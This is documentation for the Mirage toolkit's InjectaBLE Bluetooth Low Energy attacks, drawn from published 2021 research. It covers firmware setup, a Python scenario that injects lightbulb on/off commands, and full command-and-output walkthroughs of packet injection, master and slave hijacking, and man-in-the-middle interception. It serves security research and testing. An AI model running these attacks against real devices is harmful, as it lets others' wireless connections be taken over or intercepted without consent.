InjectaBLE attacks ================== In 2021, we published two papers describing a new Bluetooth Low Energy attack, named InjectaBLE, allowing to inject malicious traffic into an established BLE connection. * Romain Cayre, Florent Galtier, Guillaume Auriol, Vincent Nicomette, Mohamed Kaâniche, et al.. `InjectaBLE : injection de trafic malveillant dans une connexion Bluetooth Low Energy `_. *Symposium sur la sécurité des technologies de l'information et des communications (SSTIC 2021)*, Jun 2021, Rennes (en ligne), France. **\[fr\]** * Romain Cayre, Florent Galtier, Guillaume Auriol, Vincent Nicomette, Mohamed Kaâniche, et al.. `InjectaBLE: Injecting malicious traffic into established Bluetooth Low Energy connections `_. *IEEE/IFIP International Conference on Dependable Systems and Networks (DSN)*, Jun 2021, Taipei (virtual), Taiwan. **\[en\]** Compiling and flashing the ButteRFly firmware ---------------------------------------------- Mirage (v1.2) adds support for a new device, based on nRF52840 dongle and named ButteRFly, allowing to perform this attack. The corresponding firmware is open-source and can be downloaded `here `_ To setup this device, you have to follow these instructions: * Install the latest ARM GCC Toolchain (C++ support needed), add it to your PATH variable * Download the latest NRF5 SDK from nordic semiconductors * Install nrfutil and add it to your PATH variable * Set the SDK_ROOT environment variable to match the SDK directory Compiling the firmware is straightforward: :: $ make Then, you can use the send command to flash it on the dongle: :: $ make send The dongle should now be detected by your operating system: :: $ lsusb [...] Bus 001 Device 039: ID 5a17:0000 Mirage Toolkit ButteRFly [...] You are now ready to try the **InjectaBLE** proofs of concept ! Injecting packets into an established connection ------------------------------------------------ You can use Mirage framework to interact with the dongle and perform injection attacks. These attacks are based on a race condition, due to the fact that the Slave has to extend its listening time when it receives a Master packet because of clocks desynchronization. Then, if the attacker injects a packet before the legitimate Master, the Slave will accept the injected packet. .. image:: injectable_inject.png You can easily try this attack thanks to :doc:`ble_sniff` module. For example, let's imagine you want to inject packets into a Bluetooth Low Energy connection between a lightbulb and a smartphone. You know that the following packets allow to turn the bulb on or off: * **Write command | handle = 0x0021 | data = 5510010d0a:** turn the bulb on * **Write command | handle = 0x0021 | data = 5510000d0a:** turn the bulb off You can write the following scenario, which will inject the "on" packet when the up arrow key is pressed and the "off" packet when the down arrow key is pressed: :: from mirage.core import scenario from mirage.libs import io,ble,utils class lightbulb_injection(scenario.Scenario): def onStart(self): self.emitter = self.module.getEmitter(self.module["INTERFACE"]) def onKey(self,key): if key == "up": self.emitter.send(ble.BLEWriteCommand(handle=0x0021,value=b"\x55\x10\x01\x0d\x0a")) elif key == "down": self.emitter.send(ble.BLEWriteCommand(handle=0x0021,value=b"\x55\x10\x00\x0d\x0a")) * Save this scenario as **lightbulb_injection.py** in the *scenarios* folder. * Run the **ble_sniff** module with the following parameters: :: $ sudo mirage ble_sniff SNIFFING_MODE=newConnections SCENARIO=lightbulb_injection INTERFACE=butterfly0 [INFO] Module ble_sniff loaded ! [SUCCESS] ButteRFly device successfully instantiated ! [INFO] Scenario loaded ! [PACKET] [ CH:37|CLK:81046388.0|RSSI:0dBm ] << BLE - Advertisement Packet | type=CONNECT_REQ | srcAddr=5F:FB:09:F2:AB:3F | dstAddr=74:DA:EA:91:47:E3 | accessAddress=0x6254e35c| crcInit=0x8d0b2d| channelMap=0x1fffe007ff| hopInterval=36| hopIncrement=14 >> ┌Sniffed Connection─────────┬──────────────┬──────────────┬───────────────┐ │ Access Address │ CRCInit │ Channel Map │ Hop Interval │ Hop Increment │ ├────────────────┼──────────┼──────────────┼──────────────┼───────────────┤ │ 0x5ce35462 │ 0x2d0b8d │ 0x1fffe007ff │ 36 │ 14 │ └────────────────┴──────────┴──────────────┴──────────────┴───────────────┘ [PACKET] [ CH:24|CLK:81076014.0|RSSI:0dBm ] << BLE - Control PDU Packet | type=LL_FEATURE_REQ | data=ff7d000000000000 >> [PACKET] [ CH:28|CLK:81121245.0|RSSI:0dBm ] << BLE - Control PDU Packet | type=LL_FEATURE_RSP | data=0100000000000000 >> [...] [PACKET] [ CH:21|CLK:82298767.0|RSSI:0dBm ] << BLE - Find Information Response Packet | format=0x1 | data=4100022942000129 >> [PACKET] [ CH:35|CLK:82306036.0|RSSI:0dBm ] << BLE - Find Information Request Packet >> [PACKET] [ CH:22|CLK:82313767.0|RSSI:0dBm ] << BLE - Error Response Packet | req=0x4 | handle=0x43 | ecode=0xa >> [PACKET] [ CH:26|CLK:82321037.0|RSSI:0dBm ] << BLE - Control PDU Packet | type=LL_CONNECTION_UPDATE_REQ | data=011e0024000000f4016900 >> ^[[A[INFO] Starting injection attack: injecting ... [SUCCESS] Injection successful after 17 attempts ! ^[[B[INFO] Starting injection attack: injecting ... [SUCCESS] Injection successful after 4 attempts ! * **Establish the connection between the smartphone and the lightbulb:** when you are synchronized with the connection, you can simply inject the previously mentioned packets by pressing up or down arrows keys. Hijacking the Master role (experimental) ---------------------------------------- InjectaBLE allows to perform master hijacking attacks by injecting a *LL\_CONNECTION\_UPDATE\_IND* packet and synchronize with the Slave when the Slave changes its connection parameters. Indeed, from the Slave's perspective, the *LL\_CONNECTION\_UPDATE\_IND* indicates that the connection parameters have to be updated, however the legitimate Master didn't plan this update and will continue to use old connection parameters. .. image:: injectable_master_hijacking.png You can perform this kind of attacks by combining :doc:`ble_hijack` and :doc:`ble_master` modules: :: $ sudo mirage "ble_hijack|ble_master" ble_hijack1.INTERFACE=butterfly0 ble_hijack1.HIJACKING_MODE=newConnections ble_hijack1.ROLE=master [INFO] Module ble_hijack loaded ! [INFO] Module ble_master loaded ! [SUCCESS] ButteRFly device successfully instantiated ! [PACKET] [ CH:37|CLK:177250429.0|RSSI:0dBm ] << BLE - Advertisement Packet | type=CONNECT_REQ | srcAddr=5F:FB:09:F2:AB:3F | dstAddr=74:DA:EA:91:47:E3 | accessAddress=0x622ad17b| crcInit=0x96ce62| channelMap=0x1fffe007ff| hopInterval=36| hopIncrement=7 >> ┌Sniffed Connection─────────┬──────────────┬──────────────┬───────────────┐ │ Access Address │ CRCInit │ Channel Map │ Hop Interval │ Hop Increment │ ├────────────────┼──────────┼──────────────┼──────────────┼───────────────┤ │ 0x7bd12a62 │ 0x62ce96 │ 0x1fffe007ff │ 36 │ 7 │ └────────────────┴──────────┴──────────────┴──────────────┴───────────────┘ [INFO] Attack started in 5 seconds... [PACKET] [ CH:7|CLK:177287538.0|RSSI:0dBm ] << BLE - Control PDU Packet | type=LL_FEATURE_REQ | data=ff7d000000000000 >> [PACKET] [ CH:24|CLK:177332770.0|RSSI:0dBm ] << BLE - Control PDU Packet | type=LL_FEATURE_RSP | data=0100000000000000 >> [...] [PACKET] [ CH:30|CLK:178540292.0|RSSI:0dBm ] << BLE - Error Response Packet | req=0x4 | handle=0x43 | ecode=0xa >> [PACKET] [ CH:27|CLK:178547562.0|RSSI:0dBm ] << BLE - Control PDU Packet | type=LL_CONNECTION_UPDATE_REQ | data=01120024000000f4016b00 >> [PACKET] [ CH:8|CLK:179537580.0|RSSI:0dBm ] << BLE - Control PDU Packet | type=LL_CHANNEL_MAP_REQ | data=ff07e0ff1f8800 >> [INFO] Starting Master Hijacking attack: injecting LL_CONNECTION_UPDATE_REQ... [SUCCESS] Injection successful after 2 attempts ! [INFO] Waiting for connection update instant... [SUCCESS] Attack successful ! [INFO] SubInterface available: butterfly0:sub0 (master) [INFO] Instantiating subdevice :butterfly0:sub0 [MASTER|0x7bd12a62]: write_cmd 0x0021 5510010d0a [SUCCESS] Write Command : handle = 0x0021 / value = 5510010d0a [MASTER|0x7bd12a62]: Then, if the attack is successful you can interact with the lightbulb as if you connected directly to it using :doc:`ble_master` module. .. warning:: This attack is experimental and may be unstable depending on the targeted device. Hijacking the Slave role (experimental) ---------------------------------------- InjectaBLE allows to perform slave hijacking attacks by injecting a *LL\_TERMINATE\_IND* packet and synchronize with the Master when the Slave disconnects. .. image:: injectable_slave_hijacking.png You can perform this kind of attacks by combining :doc:`ble_hijack` and :doc:`ble_slave` modules: :: $ sudo mirage "ble_hijack|ble_slave" ble_hijack1.INTERFACE=butterfly0 ble_hijack1.HIJACKING_MODE=newConnections ble_hijack1.ROLE=slave [sudo] Mot de passe de rcayre : [INFO] Module ble_hijack loaded ! [INFO] Module ble_slave loaded ! [SUCCESS] ButteRFly device successfully instantiated ! [PACKET] [ CH:37|CLK:158609287.0|RSSI:0dBm ] << BLE - Advertisement Packet | type=CONNECT_REQ | srcAddr=5B:F0:E9:8F:91:46 | dstAddr=74:DA:EA:91:47:E3 | accessAddress=0x9e25da8b| crcInit=0x832bb3| channelMap=0x1fffe007ff| hopInterval=36| hopIncrement=9 >> ┌Sniffed Connection─────────┬──────────────┬──────────────┬───────────────┐ │ Access Address │ CRCInit │ Channel Map │ Hop Interval │ Hop Increment │ ├────────────────┼──────────┼──────────────┼──────────────┼───────────────┤ │ 0x8bda259e │ 0xb32b83 │ 0x1fffe007ff │ 36 │ 9 │ └────────────────┴──────────┴──────────────┴──────────────┴───────────────┘ [INFO] Attack started in 5 seconds... [PACKET] [ CH:9|CLK:158638763.0|RSSI:0dBm ] << BLE - Control PDU Packet | type=LL_FEATURE_REQ | data=ff7d000000000000 >> [...] [PACKET] [ CH:23|CLK:161293813.0|RSSI:0dBm ] << BLE - Control PDU Packet | type=LL_CHANNEL_MAP_REQ | data=ff01e0ff1f8d00 >> [INFO] Starting Master Hijacking attack: injecting LL_TERMINATE_IND... [SUCCESS] Attack successful ! [INFO] SubInterface available: butterfly0:sub1 (slave) [INFO] Instantiating subdevice :butterfly0:sub1 [INFO] No filename provided : empty database ! [SLAVE]: Then, if the attack is successful you can interact with the smartphone using :doc:`ble_master` module. .. warning:: This attack is experimental and may be unstable depending on the targeted device. Performing an injection-based Man-in-the-Middle attack (experimental) --------------------------------------------------------------------- InjectaBLE allows to perform MiTM attacks by injecting a LL\_CONNECTION\_UPDATE\_IND packet and synchronize with both legitimate devices when the Slave changes its connection parameters. Indeed, from the Slave's perspective, the *LL\_CONNECTION\_UPDATE\_IND* indicates that the connection parameters have to be updated, however the legitimate Master didn't plan this update and will continue to use old connection parameters. .. image:: injectable_mitm.png You can perform this kind of attacks using :doc:`ble_mitm` module as follows: :: $ sudo mirage ble_mitm INTERFACE=butterfly0 MITM_STRATEGY=injection [INFO] Module ble_mitm loaded ! [SUCCESS] ButteRFly device successfully instantiated ! [PACKET] [ CH:37|CLK:4251857.0|RSSI:0dBm ] << BLE - Advertisement Packet | type=CONNECT_REQ | srcAddr=61:A6:C4:B4:DE:BD | dstAddr=74:DA:EA:91:47:E3 | accessAddress=0x7257ddc4| crcInit=0x978537| channelMap=0x1fffe007ff| hopInterval=36| hopIncrement=8 >> ┌Sniffed Connection─────────┬──────────────┬──────────────┬───────────────┐ │ Access Address │ CRCInit │ Channel Map │ Hop Interval │ Hop Increment │ ├────────────────┼──────────┼──────────────┼──────────────┼───────────────┤ │ 0xc4dd5772 │ 0x378597 │ 0x1fffe007ff │ 36 │ 8 │ └────────────────┴──────────┴──────────────┴──────────────┴───────────────┘ [INFO] Attack started in 7 seconds... [PACKET] [ CH:8|CLK:4274594.0|RSSI:0dBm ] << BLE - Control PDU Packet | type=LL_FEATURE_REQ | data=ff7d000000000000 >> [...] [PACKET] [ CH:30|CLK:6884638.0|RSSI:0dBm ] << BLE - Control PDU Packet | type=LL_CHANNEL_MAP_REQ | data=ff07f8ff1f8c00 >> [PACKET] [ CH:24|CLK:9404673.0|RSSI:0dBm ] << BLE - Control PDU Packet | type=LL_CHANNEL_MAP_REQ | data=ff07e0ff1fc600 >> [INFO] Starting MiTM attack: injecting LL_CONNECTION_UPDATE_REQ... [SUCCESS] Injection successful after 12 attempts ! [INFO] Waiting for connection update instant... [SUCCESS] Attack successful ! [INFO] SubInterfaces available: butterfly0:sub0 (master) and butterfly0:sub1 (slave) [INFO] Instantiating subdevice :butterfly0:sub0 [INFO] Instantiating subdevice :butterfly0:sub1 [INFO] Read Request (from master) : handle = 0x3 [INFO] Redirecting to slave ... [INFO] Read Response (from slave) : value = [INFO] Redirecting to master ... [...] Then, if the attack is successful you can interact with both devices, dropping or altering the packets, etc. Please refer to the documentation of :doc:`ble_mitm` module for more details. .. warning:: This attack is experimental and may be unstable depending on the targeted device.